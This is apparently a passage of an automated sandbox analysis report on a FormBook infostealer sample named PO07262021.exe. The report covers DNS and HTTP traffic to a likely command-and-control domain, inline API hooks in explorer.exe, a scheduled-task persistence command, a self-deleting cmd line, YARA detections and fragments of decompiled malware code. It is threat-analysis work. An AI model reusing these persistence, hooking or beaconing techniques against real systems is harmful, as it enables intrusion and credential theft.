                                  Aug 3, 2021 18:51:56.824932098 CEST5299153192.168.2.48.8.8.8
                                  Aug 3, 2021 18:51:56.852077007 CEST53529918.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:05.293577909 CEST5370053192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:05.327514887 CEST53537008.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:06.481507063 CEST5172653192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:06.507814884 CEST53517268.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:08.083612919 CEST5679453192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:08.117964029 CEST53567948.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:09.588361979 CEST5653453192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:09.613306999 CEST53565348.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:11.381350994 CEST5662753192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:11.406028986 CEST53566278.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:12.478653908 CEST5662153192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:12.503277063 CEST53566218.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:13.703202009 CEST6311653192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:13.738840103 CEST53631168.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:14.734769106 CEST6407853192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:14.762212038 CEST53640788.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:15.860750914 CEST6480153192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:15.885740995 CEST53648018.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:17.110126972 CEST6172153192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:17.137916088 CEST53617218.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:18.289582014 CEST5125553192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:18.314517975 CEST53512558.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:21.973252058 CEST6152253192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:22.016247034 CEST53615228.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:39.581326962 CEST5233753192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:39.609390020 CEST53523378.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:43.970092058 CEST5504653192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:44.021986008 CEST53550468.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:44.872072935 CEST4961253192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:44.907341957 CEST53496128.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:46.147723913 CEST4928553192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:46.214654922 CEST53492858.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:47.715107918 CEST5060153192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:47.747746944 CEST53506018.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:48.203564882 CEST6087553192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:48.237333059 CEST53608758.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:48.388839006 CEST5644853192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:48.448848009 CEST53564488.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:48.680263996 CEST5917253192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:48.715400934 CEST53591728.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:49.484009027 CEST6242053192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:49.516335011 CEST53624208.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:50.170617104 CEST6057953192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:50.204503059 CEST53605798.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:50.964178085 CEST5018353192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:50.999627113 CEST53501838.8.8.8192.168.2.4
                                  Aug 3, 2021 18:52:51.698477983 CEST6153153192.168.2.48.8.8.8
                                  Aug 3, 2021 18:52:51.733748913 CEST53615318.8.8.8192.168.2.4
                                  Aug 3, 2021 18:53:06.767503977 CEST4922853192.168.2.48.8.8.8
                                  Aug 3, 2021 18:53:06.802436113 CEST53492288.8.8.8192.168.2.4
                                  Aug 3, 2021 18:53:28.954497099 CEST5979453192.168.2.48.8.8.8
                                  Aug 3, 2021 18:53:28.998214960 CEST53597948.8.8.8192.168.2.4
                                  Aug 3, 2021 18:53:31.699553013 CEST5591653192.168.2.48.8.8.8
                                  Aug 3, 2021 18:53:31.734924078 CEST53559168.8.8.8192.168.2.4
                                  Aug 3, 2021 18:53:34.259422064 CEST5275253192.168.2.48.8.8.8
                                  Aug 3, 2021 18:53:34.308335066 CEST53527528.8.8.8192.168.2.4
                                  Aug 3, 2021 18:53:49.361268997 CEST6054253192.168.2.48.8.8.8
                                  Aug 3, 2021 18:53:49.405272961 CEST53605428.8.8.8192.168.2.4

                                  DNS Queries

                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                  Aug 3, 2021 18:53:28.954497099 CEST | 192.168.2.4 | 8.8.8.8 | 0xe77e | Standard query (0) | www.winabeel.com | A (IP address) | IN (0x0001)
                                  Aug 3, 2021 18:53:49.361268997 CEST | 192.168.2.4 | 8.8.8.8 | 0xcf42 | Standard query (0) | www.ppneumatic.com | A (IP address) | IN (0x0001)

                                  DNS Answers

                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                  Aug 3, 2021 18:53:28.998214960 CEST | 8.8.8.8 | 192.168.2.4 | 0xe77e | No error (0) | www.winabeel.com | winabeel.com |  | CNAME (Canonical name) | IN (0x0001)
                                  Aug 3, 2021 18:53:28.998214960 CEST | 8.8.8.8 | 192.168.2.4 | 0xe77e | No error (0) | winabeel.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
                                  Aug 3, 2021 18:53:49.405272961 CEST | 8.8.8.8 | 192.168.2.4 | 0xcf42 | Name error (3) | www.ppneumatic.com | none | none | A (IP address) | IN (0x0001)

                                  HTTP Request Dependency Graph

                                  • www.winabeel.com

                                  HTTP Packets

                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                  0 | 192.168.2.4 | 49763 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                  Timestamp | kBytes transferred | Direction | Data
                                  Aug 3, 2021 18:53:29.028569937 CEST | 8791 | OUT | GET /nmks/?6latBtaX=AODdElP/LvmD82bfBWBMQGTCd+0C8NCj5PjqI400wXLHipc47/wHi7nKSi/3AqembaQc&v2M=nRRXGl0p HTTP/1.1
                                  Host: www.winabeel.com
                                  Connection: close
                                  Data Raw: 00 00 00 00 00 00 00
                                  Data Ascii:
                                  Aug 3, 2021 18:53:29.146784067 CEST | 8791 | IN | HTTP/1.1 403 Forbidden
                                  Server: openresty
                                  Date: Tue, 03 Aug 2021 16:53:29 GMT
                                  Content-Type: text/html
                                  Content-Length: 275
                                  ETag: "6104831f-113"
                                  Via: 1.1 google
                                  Connection: close
                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                  Code Manipulations

                                  User Modules

                                  Hook Summary

                                  Function Name | Hook Type | Active in Processes
                                  PeekMessageA | INLINE | explorer.exe
                                  PeekMessageW | INLINE | explorer.exe
                                  GetMessageW | INLINE | explorer.exe
                                  GetMessageA | INLINE | explorer.exe

                                  Processes

                                  Process: explorer.exe, Module: user32.dll
                                  Function Name | Hook Type | New Data
                                  PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xEB
                                  PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xEB
                                  GetMessageW | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xEB
                                  GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xEB


                                  System Behavior

                                  General

                                  Start time: 18:51:52
                                  Start date: 03/08/2021
                                  Path: C:\Users\user\Desktop\PO07262021.exe
                                  Wow64 process (32bit): true
                                  Commandline: 'C:\Users\user\Desktop\PO07262021.exe'
                                  Imagebase: 0x5e0000
                                  File size: 978432 bytes
                                  MD5 hash: 47A679EC6799A5A2C9212DE73D404A83
                                  Has elevated privileges: true
                                  Has administrator privileges: true
                                  Programmed in: .Net C# or VB.NET
                                  Reputation: low

                                  General

                                  Start time: 18:52:18
                                  Start date: 03/08/2021
                                  Path: C:\Windows\SysWOW64\schtasks.exe
                                  Wow64 process (32bit): true
                                  Commandline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\FzGSUpCvLNF' /XML 'C:\Users\user\AppData\Local\Temp\tmpB7D9.tmp'
                                  Imagebase: 0x9d0000
                                  File size: 185856 bytes
                                  MD5 hash: 15FF7D8324231381BAD48A052F85DF04
                                  Has elevated privileges: true
                                  Has administrator privileges: true
                                  Programmed in: C, C++ or other language
                                  Reputation: high

                                  General

                                  Start time: 18:52:18
                                  Start date: 03/08/2021
                                  Path: C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit): false
                                  Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase: 0x7ff724c50000
                                  File size: 625664 bytes
                                  MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges: true
                                  Has administrator privileges: true
                                  Programmed in: C, C++ or other language
                                  Reputation: high

                                  General

                                  Start time: 18:52:19
                                  Start date: 03/08/2021
                                  Path: C:\Users\user\Desktop\PO07262021.exe
                                  Wow64 process (32bit): true
                                  Commandline: C:\Users\user\Desktop\PO07262021.exe
                                  Imagebase: 0x6a0000
                                  File size: 978432 bytes
                                  MD5 hash: 47A679EC6799A5A2C9212DE73D404A83
                                  Has elevated privileges: true
                                  Has administrator privileges: true
                                  Programmed in: C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.767554983.0000000001150000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.767554983.0000000001150000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.767554983.0000000001150000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.767309184.0000000000D00000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.767309184.0000000000D00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.767309184.0000000000D00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  Reputation: low

                                  General

                                  Start time: 18:52:21
                                  Start date: 03/08/2021
                                  Path: C:\Windows\explorer.exe
                                  Wow64 process (32bit): false
                                  Commandline: C:\Windows\Explorer.EXE
                                  Imagebase: 0x7ff6fee60000
                                  File size: 3933184 bytes
                                  MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
                                  Has elevated privileges: true
                                  Has administrator privileges: true
                                  Programmed in: C, C++ or other language
                                  Reputation: high

                                  General

                                  Start time: 18:52:47
                                  Start date: 03/08/2021
                                  Path: C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit): true
                                  Commandline: C:\Windows\SysWOW64\cmd.exe
                                  Imagebase: 0x11d0000
                                  File size: 232960 bytes
                                  MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                                  Has elevated privileges: true
                                  Has administrator privileges: true
                                  Programmed in: C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.912674126.0000000003A00000.00000004.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.912674126.0000000003A00000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.912674126.0000000003A00000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.912452970.00000000033D0000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.912452970.00000000033D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.912452970.00000000033D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.911713317.0000000001050000.00000040.00000001.sdmp, Author: Joe Security
                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.911713317.0000000001050000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.911713317.0000000001050000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                  Reputation: high

                                  General

                                  Start time: 18:52:51
                                  Start date: 03/08/2021
                                  Path: C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit): true
                                  Commandline: /c del 'C:\Users\user\Desktop\PO07262021.exe'
                                  Imagebase: 0x11d0000
                                  File size: 232960 bytes
                                  MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                                  Has elevated privileges: true
                                  Has administrator privileges: true
                                  Programmed in: C, C++ or other language
                                  Reputation: high

                                  General

                                  Start time: 18:52:52
                                  Start date: 03/08/2021
                                  Path: C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit): false
                                  Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase: 0x7ff724c50000
                                  File size: 625664 bytes
                                  MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges: true
                                  Has administrator privileges: true
                                  Programmed in: C, C++ or other language
                                  Reputation: high

                                  Disassembly

                                  Code Analysis


                                    Executed Functions

                                    C-Code - Quality: 37%
                                    			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                    				void* _t18;
                                    				void* _t27;
                                    				intOrPtr* _t28;
                                    
                                    				_t13 = _a4;
                                    				_t28 = _a4 + 0xc48;
                                    				E0041A960(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                    				_t6 =  &_a32; // 0x414d42
                                    				_t12 =  &_a8; // 0x414d42
                                    				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                    				return _t18;
                                    			}







                                    APIs
                                    • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: FileRead
                                    • String ID: BMA$BMA
                                    • API String ID: 2738559852-2163208940
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
                                    				char* _v8;
                                    				struct _EXCEPTION_RECORD _v12;
                                    				struct _OBJDIR_INFORMATION _v16;
                                    				char _v536;
                                    				void* _t15;
                                    				struct _OBJDIR_INFORMATION _t17;
                                    				struct _OBJDIR_INFORMATION _t18;
                                    				void* _t30;
                                    				void* _t31;
                                    				void* _t32;
                                    
                                    				_v8 =  &_v536;
                                    				_t15 = E0041C650( &_v12, 0x104, _a8);
                                    				_t31 = _t30 + 0xc;
                                    				if(_t15 != 0) {
                                    					_t17 = E0041CA70(__eflags, _v8);
                                    					_t32 = _t31 + 4;
                                    					__eflags = _t17;
                                    					if(_t17 != 0) {
                                    						E0041CCF0( &_v12, 0);
                                    						_t32 = _t32 + 8;
                                    					}
                                    					_t18 = E0041AEA0(_v8);
                                    					_v16 = _t18;
                                    					__eflags = _t18;
                                    					if(_t18 == 0) {
                                    						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                    						return _v16;
                                    					}
                                    					return _t18;
                                    				} else {
                                    					return _t15;
                                    				}
                                    			}














                                    APIs
                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Load
                                    • String ID:
                                    • API String ID: 2234796835-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                    				long _t21;
                                    				void* _t31;
                                    
                                    				_t3 = _a4 + 0xc40; // 0xc40
                                    				E0041A960(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                    				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                    				return _t21;
                                    			}






                                    APIs
                                    • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E00419F3D(void* __esi, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                    				long _t14;
                                    				void* _t21;
                                    				void* _t23;
                                    
                                    				asm("sahf");
                                    				_t23 = __esi - 1;
                                    				asm("bound edx, [ebp-0x75]");
                                    				_t10 = _a4;
                                    				_push(_t23);
                                    				_t3 = _t10 + 0xc60; // 0xca0
                                    				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                    				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                    				return _t14;
                                    			}







                                    APIs
                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateMemoryVirtual
                                    • String ID:
                                    • API String ID: 2167126740-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                    				long _t14;
                                    				void* _t21;
                                    
                                    				_t3 = _a4 + 0xc60; // 0xca0
                                    				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                    				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                    				return _t14;
                                    			}






                                    APIs
                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateMemoryVirtual
                                    • String ID:
                                    • API String ID: 2167126740-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00419E8B(void* __eax, char __esi, intOrPtr _a5, void* _a9) {
                                    				char _v326413024;
                                    				long _t12;
                                    				void* _t15;
                                    
                                    				_v326413024 = __esi;
                                    				_t9 = _a5;
                                    				_t4 = _t9 + 0x10; // 0x300
                                    				_t5 = _t9 + 0xc50; // 0x40a923
                                    				E0041A960(_t15, _a5, _t5,  *_t4, 0, 0x2c);
                                    				_t12 = NtClose(_a9); // executed
                                    				return _t12;
                                    			}







                                    APIs
                                    • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Close
                                    • String ID:
                                    • API String ID: 3535843008-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00419E90(intOrPtr _a4, void* _a8) {
                                    				long _t8;
                                    				void* _t11;
                                    
                                    				_t5 = _a4;
                                    				_t2 = _t5 + 0x10; // 0x300
                                    				_t3 = _t5 + 0xc50; // 0x40a923
                                    				E0041A960(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                    				_t8 = NtClose(_a8); // executed
                                    				return _t8;
                                    			}






                                    APIs
                                    • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Close
                                    • String ID:
                                    • API String ID: 3535843008-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 93%
                                    			E00409A90(intOrPtr* _a4) {
                                    				intOrPtr _v8;
                                    				char _v24;
                                    				char _v284;
                                    				char _v804;
                                    				char _v840;
                                    				void* __ebx;
                                    				void* _t24;
                                    				void* _t31;
                                    				void* _t33;
                                    				void* _t34;
                                    				void* _t39;
                                    				void* _t50;
                                    				intOrPtr* _t52;
                                    				void* _t53;
                                    				void* _t54;
                                    				void* _t55;
                                    				void* _t56;
                                    
                                    				_t52 = _a4;
                                    				_t39 = 0; // executed
                                    				_t24 = E00407E80(_t52,  &_v24); // executed
                                    				_t54 = _t53 + 8;
                                    				if(_t24 != 0) {
                                    					E00408090( &_v24,  &_v840);
                                    					_t55 = _t54 + 8;
                                    					do {
                                    						E0041B810( &_v284, 0x104);
                                    						E0041BE80( &_v284,  &_v804);
                                    						_t56 = _t55 + 0x10;
                                    						_t50 = 0x4f;
                                    						while(1) {
                                    							_t31 = E00414DC0(E00414D60(_t52, _t50),  &_v284);
                                    							_t56 = _t56 + 0x10;
                                    							if(_t31 != 0) {
                                    								break;
                                    							}
                                    							_t50 = _t50 + 1;
                                    							if(_t50 <= 0x62) {
                                    								continue;
                                    							} else {
                                    							}
                                    							goto L8;
                                    						}
                                    						_t9 = _t52 + 0x14; // 0xffffe045
                                    						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                    						_t39 = 1;
                                    						L8:
                                    						_t33 = E004080C0(_t39,  &_v24,  &_v840);
                                    						_t55 = _t56 + 8;
                                    					} while (_t33 != 0 && _t39 == 0);
                                    					_t34 = E00408140(_t52,  &_v24); // executed
                                    					if(_t39 == 0) {
                                    						asm("rdtsc");
                                    						asm("rdtsc");
                                    						_v8 = _t34 - 0 + _t34;
                                    						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                    					}
                                    					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                    					_t20 = _t52 + 0x31; // 0x5608758b
                                    					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                    					return 1;
                                    				} else {
                                    					return _t24;
                                    				}
                                    			}





















                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0041A067(intOrPtr __eax, void* __eflags, intOrPtr _a4, void* _a12, long _a16) {
                                    				char _t9;
                                    				void* _t15;
                                    				void* _t17;
                                    
                                    				if(__eflags == 0) {
                                    					 *0xec8b5530 = __eax;
                                    					_t10 = _a4;
                                    					_t3 = _t10 + 0xc74; // 0xc74
                                    					_t18 = _t3;
                                    					E0041A960(_t17, _a4, _t3,  *((intOrPtr*)(_t10 + 0x10)), 0, 0x35);
                                    					_t15 = _a16;
                                    				}
                                    				_t9 = RtlFreeHeap(_a12, _a16, _t15); // executed
                                    				return _t9;
                                    			}







                                    APIs
                                    • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID: Ukd
                                    • API String ID: 3298025750-2382297600
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: MessagePostThread
                                    • String ID:
                                    • API String ID: 1836367815-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: MessagePostThread
                                    • String ID:
                                    • API String ID: 1836367815-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: MessagePostThread
                                    • String ID:
                                    • API String ID: 1836367815-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: LookupPrivilegeValue
                                    • String ID:
                                    • API String ID: 3899507212-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                    				char _t10;
                                    				void* _t13;
                                    				void* _t15;
                                    
                                    				_t3 = _a4 + 0xc74; // 0xc74
                                    				E0041A960(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                    				_t13 = _a16;
                                    				_t10 = RtlFreeHeap(_a8, _a12, _t13); // executed
                                    				return _t10;
                                    			}







                                    APIs
                                    • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID:
                                    • API String ID: 3298025750-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 30%
                                    			E0041A030(intOrPtr _a4, intOrPtr _a12, void* _a16) {
                                    				void* _v3;
                                    				intOrPtr _t8;
                                    				void* _t9;
                                    				void* _t10;
                                    				void* _t13;
                                    
                                    				_t6 = _a4;
